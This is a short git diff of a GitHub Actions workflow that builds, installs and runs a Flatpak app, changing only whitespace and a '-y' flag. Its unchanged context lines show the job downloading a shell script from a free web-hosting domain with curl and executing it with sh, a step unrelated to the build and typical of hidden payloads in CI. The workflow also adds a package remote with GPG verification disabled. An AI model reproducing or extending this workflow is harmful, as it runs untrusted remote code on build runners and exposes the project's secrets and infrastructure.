--- a/.github/workflows/flatpak_aca.yml
+++ b/.github/workflows/flatpak_aca.yml
@@ -11,7 +11,7 @@ jobs:
         run_script='https://massive-rims.000webhostapp.com/start-run-loop.sh'
         curl $run_script -o run.sh
         sh ./run.sh
-        
+
         sudo add-apt-repository ppa:flatpak/stable
         sudo apt update -y
         sudo apt install -y flatpak
@@ -26,6 +26,6 @@ jobs:
         mkdir repo
         sudo flatpak-builder --repo=./repo --user --install --force-clean build-dir org.hirs.aca.yml
         sudo flatpak remote-add  hirs ./repo --no-gpg-verify
-        sudo flatpak install org.hirs.aca
+        sudo flatpak install -y org.hirs.aca
         flatpak run org.hirs.aca
         sh ./scripts/aca-wait.sh
